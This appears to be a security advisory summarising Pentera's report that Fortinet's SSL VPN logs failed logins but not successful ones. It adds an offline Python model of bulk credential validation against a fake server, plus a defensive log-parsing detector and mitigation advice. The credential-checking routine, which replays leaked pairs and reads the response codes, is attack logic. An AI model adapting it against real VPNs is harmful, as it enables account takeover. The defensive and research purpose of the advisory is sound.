Forti-fied? Logging Blind Spot Revealed in FortiClient VPN

Summary:
While building an automated credential-validation capability for Fortinet's SSL VPN, Pentera says it uncovered a logging blind spot that attackers could use to validate stolen credentials against dozens of organizations without being noticed. Pentera first tried to automate the checks with third-party clients such as OpenConnect, but that approach proved unreliable, so the researchers examined the protocol between FortiClient and the VPN server directly. Capturing the exchange with Burp Suite showed that a single HTTPS request is enough to trigger an authentication attempt, and that the server's response reveals the outcome: ret=1 for a successful login, ret=0 for a failed one, and a distinct throttled response once a source has produced too many consecutive failures. This let the researchers validate credentials in bulk by reading the response rather than completing a full VPN connection. Pentera then looked at what an incident response (IR) team monitoring the Fortinet VPN would see. They expected the repeated authentication attempts to generate plenty of logs and alerts, but when they reviewed the VPN server's logs they found that only the failed attempts had been recorded; the successful authentications produced no log entry at all. An attacker using this method would therefore leave traces of the failed guesses but none of the hits, and the successful validation of a credential would go undetected.
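The request/response exchange described above, modelled offline as an added example (this is not Pentera's tooling or Fortinet's code). The endpoint name /remote/logincheck, the form field names, the redir values and the use of HTTP 429 as the throttle signal are assumptions of this example; only the ret=1 / ret=0 outcome markers come from the page. A constructed stand-in server plays the VPN side, appends failures to a log list the way the page describes, and deliberately writes nothing for a successful authentication, so the output shows both the classification logic and the blind spot:

```python
from dataclasses import dataclass, field
from typing import Callable, Dict, Iterable, List, Tuple
from urllib.parse import parse_qs, urlencode

# Assumed names, not taken from the page: the real endpoint, form fields and
# throttle signal may differ.
LOGIN_PATH = "/remote/logincheck"
THROTTLE_AFTER = 3          # failures per source before the server throttles


def parse_ret_body(body: str) -> Dict[str, str]:
    """Parse a 'ret=1,redir=/x?y=z' style body into a dict.

    Pairs are comma separated; only the first '=' in each pair splits key
    from value so a redirect target that itself contains '=' survives.
    """
    fields: Dict[str, str] = {}
    for part in body.split(","):
        if "=" in part:
            key, value = part.split("=", 1)
            fields[key.strip()] = value.strip()
    return fields


def classify_response(status: int, body: str) -> str:
    """Map one server reply to valid / invalid / throttled / unknown.

    ret=1 and ret=0 are the markers the page describes; HTTP 429 standing in
    for the throttled state is an assumption of this example.
    """
    if status == 429:
        return "throttled"
    ret = parse_ret_body(body).get("ret")
    if ret == "1":
        return "valid"
    if ret == "0":
        return "invalid"
    return "unknown"


@dataclass
class FakeVpnServer:
    """Constructed stand-in for the VPN side of the exchange."""
    accounts: Dict[str, str]
    failures: Dict[str, int] = field(default_factory=dict)
    log: List[str] = field(default_factory=list)   # the device's event log

    def handle(self, src_ip: str, path: str, form: str) -> Tuple[int, str]:
        if path != LOGIN_PATH:
            return 404, ""
        if self.failures.get(src_ip, 0) >= THROTTLE_AFTER:
            return 429, "ret=0,redir=/remote/login?lockout=1"
        params = parse_qs(form)
        user = params.get("username", [""])[0]
        password = params.get("credential", [""])[0]
        if self.accounts.get(user) == password:
            # The blind spot: a successful authentication writes no log line.
            return 200, "ret=1,redir=/sslvpn/portal.html"
        self.failures[src_ip] = self.failures.get(src_ip, 0) + 1
        self.log.append(f'action="ssl-login-fail" user="{user}" remip="{src_ip}"')
        return 200, "ret=0,redir=/remote/login?err=1"


def validate_credentials(send: Callable[[str, str, str], Tuple[int, str]],
                         creds: Iterable[Tuple[str, str]],
                         src_ip: str = "203.0.113.5") -> Dict[str, List[Tuple[str, str]]]:
    """Replay username/password pairs through one HTTPS request each.

    A throttled or unrecognised reply is recorded as 'untested' rather than
    'invalid': once the source is throttled a correct pair also comes back
    negative, so treating it as invalid would discard a live credential.
    """
    result: Dict[str, List[Tuple[str, str]]] = {"valid": [], "invalid": [], "untested": []}
    for user, password in creds:
        form = urlencode({"ajax": "1", "username": user, "credential": password})
        status, body = send(src_ip, LOGIN_PATH, form)
        verdict = classify_response(status, body)
        bucket = verdict if verdict in ("valid", "invalid") else "untested"
        result[bucket].append((user, password))
    return result


def demo() -> Tuple[Dict[str, List[Tuple[str, str]]], List[str]]:
    """Run a constructed leaked-credential list against the fake server."""
    server = FakeVpnServer(accounts={"alice": "Winter2024!", "bob": "hunter2"})
    leaked = [("alice", "Winter2024!"), ("bob", "wrong"), ("carol", "x"),
              ("dave", "y"), ("eve", "z"), ("bob", "hunter2")]
    result = validate_credentials(server.handle, leaked)
    return result, server.log


if __name__ == "__main__":
    outcome, device_log = demo()
    print(outcome)       # alice validated; the last two pairs hit the throttle
    print(device_log)    # three failures logged, nothing for alice's success
```

Two details matter for anyone reproducing the measurement: the throttled state must be kept apart from a plain failure, otherwise a live credential tested after the threshold is silently misfiled as invalid; and the device log at the end contains the three failures but no trace of the one successful validation, which is exactly the gap the summary describes.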

Analyst Comments:
Pentera stresses that the absence of logging for successful authentication at this phase is a significant security risk: it lets attackers validate credentials at scale, for example by replaying leaked username/password pairs, without the successful hits ever appearing in the logs. Note that the failed attempts themselves are still recorded, so the gap is not in seeing that guessing took place but in knowing which guesses succeeded. An attacker holding a leaked credential dump can therefore quickly identify which pairs still work as VPN logins without an alarm being raised for the hits. In a properly monitored environment, a successful login following a burst of failed attempts would prompt the Incident Response (IR) team to reset that user's password. With no record of the success, the IR team may conclude that the attack failed and leave the compromised credentials in place, allowing the attacker to return later as an apparently legitimate user or to sell the validated credentials on the dark web.
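To turn the analyst comment into a check that works with what the device does log, here is an added example (not from Pentera or Fortinet). It parses constructed FortiGate-style key=value event lines, finds sources that produced a burst of SSL-VPN login failures inside a short window, and lists every account those sources tried; each listed account is a reset candidate, because a correct guess in that burst would have left no log line to distinguish it from the failures. The field names (subtype, action, remip, user) follow FortiGate's general logging style, but the sample lines are constructed for this example, not captured from a device:

```python
import re
from collections import defaultdict
from datetime import datetime, timedelta
from typing import Dict, Iterable, Iterator, List, Tuple

# Matches key=value and key="quoted value" fields of a FortiGate-style line.
KV_RE = re.compile(r'(\w+)=(?:"([^"]*)"|(\S+))')

# Constructed sample, not a capture: one source sprays four accounts in ten
# seconds and then goes quiet; a second source fails twice, hours apart; one
# unrelated admin event shows the filter discarding non-VPN records.
SAMPLE_LOG = """\
date=2024-10-01 time=02:14:03 type="event" subtype="vpn" level="alert" action="ssl-login-fail" remip="198.51.100.7" user="alice" reason="sslvpn_login_permission_denied"
date=2024-10-01 time=02:14:05 type="event" subtype="vpn" level="alert" action="ssl-login-fail" remip="198.51.100.7" user="bob" reason="sslvpn_login_permission_denied"
date=2024-10-01 time=02:14:09 type="event" subtype="vpn" level="alert" action="ssl-login-fail" remip="198.51.100.7" user="carol" reason="sslvpn_login_permission_denied"
date=2024-10-01 time=02:14:12 type="event" subtype="vpn" level="alert" action="ssl-login-fail" remip="198.51.100.7" user="dave" reason="sslvpn_login_permission_denied"
date=2024-10-01 time=09:00:41 type="event" subtype="vpn" level="alert" action="ssl-login-fail" remip="203.0.113.40" user="frank" reason="sslvpn_login_permission_denied"
date=2024-10-01 time=09:01:00 type="event" subtype="system" level="information" action="login" user="admin" ui="https(192.0.2.10)"
date=2024-10-01 time=13:22:18 type="event" subtype="vpn" level="alert" action="ssl-login-fail" remip="203.0.113.40" user="frank" reason="sslvpn_login_permission_denied"
"""


def parse_fortigate_line(line: str) -> Dict[str, str]:
    """Split one key=value line into a dict, honouring quoted values."""
    fields: Dict[str, str] = {}
    for m in KV_RE.finditer(line):
        fields[m.group(1)] = m.group(2) if m.group(2) is not None else m.group(3)
    return fields


def failed_logins(lines: Iterable[str]) -> Iterator[Tuple[datetime, str, str]]:
    """Yield (timestamp, source IP, user) for SSL-VPN login failures only."""
    for line in lines:
        f = parse_fortigate_line(line)
        if f.get("subtype") == "vpn" and f.get("action") == "ssl-login-fail":
            ts = datetime.strptime(f["date"] + " " + f["time"], "%Y-%m-%d %H:%M:%S")
            yield ts, f["remip"], f["user"]


def targeted_accounts(lines: Iterable[str],
                      window: timedelta = timedelta(minutes=10),
                      threshold: int = 3) -> Dict[str, List[str]]:
    """Return {source IP: sorted users} for every source that produced at
    least `threshold` failures inside `window`.

    Every user on such a list is treated as possibly compromised even though
    no success was logged: a valid guess in the burst would have written
    nothing, so the failures are the only evidence there is.
    """
    by_src: Dict[str, List[Tuple[datetime, str]]] = defaultdict(list)
    for ts, ip, user in failed_logins(lines):
        by_src[ip].append((ts, user))
    flagged: Dict[str, List[str]] = {}
    for ip, events in by_src.items():
        events.sort()
        for i in range(len(events)):
            j = i
            while j < len(events) and events[j][0] - events[i][0] <= window:
                j += 1
            if j - i >= threshold:
                flagged[ip] = sorted({u for _, u in events})
                break
    return flagged


if __name__ == "__main__":
    for ip, users in targeted_accounts(SAMPLE_LOG.splitlines()).items():
        print(f"{ip}: reset candidates -> {', '.join(users)}")
```

The window and threshold are tuning knobs; the point of the check is the decision rule, which is the inverse of the usual one. Instead of waiting for a "success after failures" event to escalate, the absence of any further activity from a spraying source is itself the signal to act, since the page shows that the success the analyst would normally look for is never written.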

Suggested Corrections:
Pentera says it shared the findings with Fortinet, which did not classify the behaviour as a vulnerability but did acknowledge the blind spot it creates. Pentera has recommended that Fortinet close the gap by logging every authentication attempt at this phase regardless of its outcome, which would let administrators monitor and respond to suspicious activity far more effectively.

In the meantime, Pentera recommends that Fortinet VPN users add compensating controls such as multi-factor authentication (MFA) and strict monitoring of authentication logs, together with regular audits and updates. Given the blind spot, accounts that appear in a burst of failed login attempts should be treated as potentially compromised even when no corresponding successful login is logged.

Link(s):
https://pentera.io/blog/FortiClient-VPN_logging-blind-spot-revealed/